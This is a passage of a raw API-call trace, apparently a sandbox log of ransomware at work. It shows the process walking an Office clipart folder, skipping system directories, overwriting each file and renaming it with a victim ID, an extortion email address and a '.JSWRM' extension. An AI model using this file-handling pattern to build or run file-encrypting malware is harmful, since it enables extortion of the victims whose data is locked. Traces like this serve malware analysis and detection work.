RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0076.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0076.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0076.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0076.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0076.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.748] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0076.749] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b2e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="ED00184_.WMF", cAlternateFileName="")) returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2=".") returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="..") returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="...") returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="windows") returned -1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="recovery") returned -1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="perflogs") returned -1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="documents and settings") returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="system volume information") returned -1 [0076.749] lstrcmpiW (lpString1="ED00184_.WMF", lpString2="msocache") returned -1 [0076.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00184_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00184_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00184_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00184_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0076.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.750] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6958) returned 1 [0076.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.750] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b20) returned 0x205850 [0076.750] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b20, lpOverlapped=0x0) returned 1 [0076.752] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.752] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b20, lpOverlapped=0x0) returned 1 [0076.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.752] CloseHandle (hObject=0x314) returned 1 [0076.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0076.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0076.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00184_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00184_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0076.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.753] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3670, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00006_.WMF", cAlternateFileName="")) returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2=".") returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="..") returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="...") returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="windows") returned -1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="recovery") returned -1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="perflogs") returned -1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="documents and settings") returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.753] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="system volume information") returned -1 [0076.754] lstrcmpiW (lpString1="EN00006_.WMF", lpString2="msocache") returned -1 [0076.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0076.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00006_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00006_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00006_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0076.754] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.754] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0076.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.755] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13936) returned 1 [0076.755] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.755] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3670) returned 0x24d210 [0076.756] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3670, lpOverlapped=0x0) returned 1 [0076.758] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.758] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3670, lpOverlapped=0x0) returned 1 [0076.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.758] CloseHandle (hObject=0x314) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0076.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0076.758] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0076.758] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0076.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.759] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00006_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00006_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0076.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0076.759] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0076.759] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b1a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="EN00202_.WMF", cAlternateFileName="")) returned 1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2=".") returned 1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="..") returned 1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="...") returned 1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="windows") returned -1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="recovery") returned -1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="perflogs") returned -1 [0076.759] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="documents and settings") returned 1 [0076.760] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.760] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="system volume information") returned -1 [0076.760] lstrcmpiW (lpString1="EN00202_.WMF", lpString2="msocache") returned -1 [0076.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00202_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00202_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00202_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0076.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00202_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EN00202_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EN00202_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0076.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0076.760] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0076.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.760] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6938) returned 1 [0076.760] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.760] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b10) returned 0x205850 [0076.760] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b10, lpOverlapped=0x0) returned 1 [0076.831] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.831] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b10, lpOverlapped=0x0) returned 1 [0076.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.831] CloseHandle (hObject=0x314) returned 1 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0076.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0076.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.831] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\en00202_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft 